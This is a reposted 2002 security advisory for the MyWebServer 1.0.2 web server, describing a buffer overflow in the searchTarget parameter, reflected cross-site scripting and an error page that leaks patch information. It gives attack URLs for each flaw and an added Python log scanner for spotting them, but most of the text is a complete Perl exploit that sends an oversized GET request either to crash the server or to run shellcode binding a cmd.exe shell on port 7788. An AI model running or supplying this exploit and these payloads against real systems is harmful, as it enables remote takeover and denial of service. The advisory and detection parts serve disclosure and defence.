MyWebServer Buffer Overflow / Cross-Site Scripting / Information Disclosure Vulnerabilities (MS, patch)

/ns/ld/softld/data/20020820025336.htm

Reposted

Affected program:
MyWebServer

Description:
Buffer overflow / cross-site scripting / information disclosure vulnerabilities in MyWebServer

Details:
MyWebServer is a small web server that runs on Microsoft Windows.

MyWebServer has multiple vulnerabilities that a remote attacker can exploit to carry out buffer overflow, cross-site scripting and information disclosure attacks.

MyWebServer contains the following vulnerabilities:

1. The MWS search engine in MyWebServer does not properly bounds-check the data submitted in the 'searchTarget=' parameter. A remote attacker can submit an overly long string for 'searchTarget='; when the MWS search engine processes it, a buffer overflow occurs. Random data crashes the web service, and carefully crafted data can execute arbitrary code with the privileges of the web server process.

2. MyWebServer does not filter user-submitted data. An attacker can construct a link containing malicious script, HTML or JavaScript code; when a user opens the link, the malicious code executes in the user's browser and can disclose the user's authentication cookies.

3. Requesting a non-existent directory from MyWebServer directly causes it to return an error page that contains patch information.


Affected systems:
MyWebServer 1.0.2


Attack method:
Buffer overflow:

http://vuln_host/MWS/HandleSearch.html?searchTarget=[990b_of_any_data]&B1=Submit

Cross-site scripting:

http://vuln_host/[223b_of_any_data]<font%20size=50>DEFACED<!--//--

Patch information disclosure:

http://vuln_host/[not_exists_dir]
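As an added example (not part of the original advisory), a small Python scanner that flags the three request patterns above in Common Log Format access logs: an oversized searchTarget value to the MWS search handler, HTML markup in the request path, and 404s for directory-style paths. The 256-byte threshold, the indicator names and the sample log lines are constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Assumed threshold for this advisory: the overflow needs ~989 bytes in searchTarget,
# so a much smaller limit still catches it without flagging ordinary searches.
MAX_SEARCH_TARGET = 256
HTML_TAG = re.compile(r"<[A-Za-z!/]")  # start of an HTML tag or comment
# Common Log Format: client ident user [time] "METHOD target HTTP/x.y" status size
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d" (\d{3})')

def classify_request(target, status):
    """Return the indicator names matched by one request target and status code."""
    findings = []
    parts = urlsplit(target)
    path = unquote(parts.path)
    query = parse_qs(parts.query, keep_blank_values=True)
    # 1. Oversized searchTarget sent to the MWS search handler (overflow vector)
    if path.lower().endswith("/mws/handlesearch.html") and any(
            len(v) > MAX_SEARCH_TARGET for v in query.get("searchTarget", [])):
        findings.append("mws-searchtarget-overflow")
    # 2. HTML markup in the request path, which the server reflects unescaped (XSS vector)
    if HTML_TAG.search(path):
        findings.append("html-in-path-xss")
    # 3. 404 for a directory-style path: the error page discloses patch information
    if status == 404 and "." not in path.rsplit("/", 1)[-1]:
        findings.append("404-directory-probe")
    return findings

def scan_log(lines):
    """Return (client, findings) for every CLF line that matches at least one indicator."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a Common Log Format line
        client, target, status = m.groups()
        findings = classify_request(target, int(status))
        if findings:
            hits.append((client, findings))
    return hits

# Constructed sample log lines for demonstration; not captured from a real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Aug/2002:02:53:36 +0800] "GET /index.html HTTP/1.0" 200 1024',
    '10.0.0.5 - - [20/Aug/2002:02:53:37 +0800] "GET /MWS/HandleSearch.html?searchTarget=readme&B1=Submit HTTP/1.0" 200 2048',
    '10.0.0.9 - - [20/Aug/2002:02:53:40 +0800] "GET /MWS/HandleSearch.html?searchTarget='
    + "A" * 990 + '&B1=Submit HTTP/1.0" 500 0',
    '10.0.0.9 - - [20/Aug/2002:02:53:41 +0800] "GET /' + "A" * 223
    + '<font%20size=50>DEFACED<!--//-- HTTP/1.0" 200 300',
    '10.0.0.9 - - [20/Aug/2002:02:53:42 +0800] "GET /not_exists_dir HTTP/1.0" 404 512',
]
```

Only the three malicious sample lines produce hits; the benign index and search requests do not, which is the false-positive check worth keeping when tuning the threshold.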


D4rkGr3y (grey_1999@mail.ru) provided the following test program:

#!/usr/bin/perl
###############################################
# Remote MWS DoS/root exploit
# Vulnerable: MyWebServer v.1.0.2 and lower
# Support: www.mywebserver.org
# Bug: buffer overflow in get-requests.
# Usage: perl mws.pl [-d or -r] [host] [port]
# -d - DoS (100% work)
# -r - DoS and running shellcode
# Possible some problems with it... if shellcode
# doesn't work correctly, try another one.
# Buffer size 989b.
# Author: D4rkGr3y
###############################################
use strict;
use warnings;
use IO::Socket;

# Request path for -r: filler bytes followed by the shellcode. It is one string;
# it is split with '.' here only so that no source line is wrapped mid-escape.
my $shellcode = "/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xeb\x03\x5d\xeb\x05\xe8"
    . "\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30"
    . "\x97\x40\xe2\xfa\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36\x97\x97"
    . "\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97\x97\x77\xe0\x7f\x4b\x96\x97"
    . "\x97\x16\x6c\x97\x97\x68\x28\x98\x14\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac"
    . "\xda\xcd\xe2\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14\x57\xef"
    . "\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5\xd9\xe2\x52\x16\xee\x93\xd2\xdb"
    . "\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7"
    . "\xe2\x9e\x16\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68\x94\x6c\x1c"
    . "\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1\x87\xdf\x94\x6f\xa4\x5e\x1c\x58"
    . "\x94\x5e\x94\x5e\x94\xd9\x8b\x94\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c"
    . "\x40\xa4\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68\x85\xcd\x1e"
    . "\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99"
    . "\x13\x5e\xe3\x9e\xc5\xc1\xc4\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c"
    . "\x4f\xa4\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5\xc1\xc4\x68\x85"
    . "\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0"
    . "\x7b\xfd\x95\xc4\x68\xc0\x67\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0"
    . "\xc1\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf\x27\xd3\x1e\x90"
    . "\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57"
    . "\xf1\x2f\x96\x96\x1e\xd0\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1"
    . "\xa4\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0\x5b\xdf\xc7\xc7\xc4"
    . "\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57"
    . "\x1c\x5f\x22\x93\xc7\xc7\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
    . "\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4\x57\xc7\x68\xa0\xc1"
    . "\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b"
    . "\xc0\xa4\x5e\xc6\xc7\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68"
    . "\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f\x97\x97\x97\x50\x97\xef"
    . "\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70"
    . "\xe0\xb4\x17\x70\xe0\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5\xd9"
    . "\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2\x97\xd0\xf2\xe3\xc4\xe3"
    . "\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2"
    . "\xe4\xe4\xd6\x97\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc\xd9"
    . "\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb\xd6\xfb\xfb\xf8\xf4\x97\xc0"
    . "\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2"
    . "\xf2\xe7\x97\xd2\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4\xdc\xa4"
    . "\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97\xfb\xfe\xe4\xe3\xf2\xf9\x97"
    . "\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97"
    . "\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97\x68\x68"
    . "\x68\x68";

# Request path for -d: filler bytes only, enough to overflow the buffer.
my $dos = "/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";

my $param = $ARGV[0];
my $host  = $ARGV[1];
my $port  = $ARGV[2];
print "\n\n";
print "[DamageHackingGroup|www.dhgroup.org]\n";
print "#MyWebServer v.1.0.2 - www.mywebserver.org\n";
print "#Remote DoS/root xsploit (opens cmd.exe shell on port 7788)\n";
print "#Shellcode written by isno\n";
if (defined $param && defined $host && defined $port) {
    if ($param eq "-d") {
        DoS();
    } else {
        get_root();
    }
} else {
    print "Error in Params.\n";
    print "Usage: perl mws.pl [-d or -r] [host] [port]\n";
    print "-d - kill web server\n";
    die "-r - open shell on port 7788 (only ME/XP)\n";
}

# Send the filler-only request; the overflow crashes the server process.
sub DoS {
    print "Connecting to '$host' ... ";
    my $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
                                       Proto => "tcp", Type => SOCK_STREAM)
        or die "Couldn't connect.\n";
    print "Connected.\n";
    print "Attacking target ... ";
    print $socket "GET $dos HTTP/1.0\n\n";
    print "Complete.\n";
    print "$host is dead.\n";
    close($socket);
    return;
}

# Send the filler plus shellcode request.
sub get_root {
    print "Connecting to '$host' ...";
    my $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
                                       Proto => "tcp", Type => SOCK_STREAM)
        or die "Couldn't connect.\n";
    print "Connected.\n";
    print "Running shellcode ... ";
    print $socket "GET $shellcode HTTP/1.0\n\n";
    print "Complete.\n";
    print "Now type 'telnet $host 7788' and have a nice day :)\n";
    close($socket);
    return;
}



Solution:
The vendor has not yet released a patch or upgrade. Users are advised to switch to another web server for the time being, or to watch the vendor's home page for the latest version:

http://www.mywebserver.org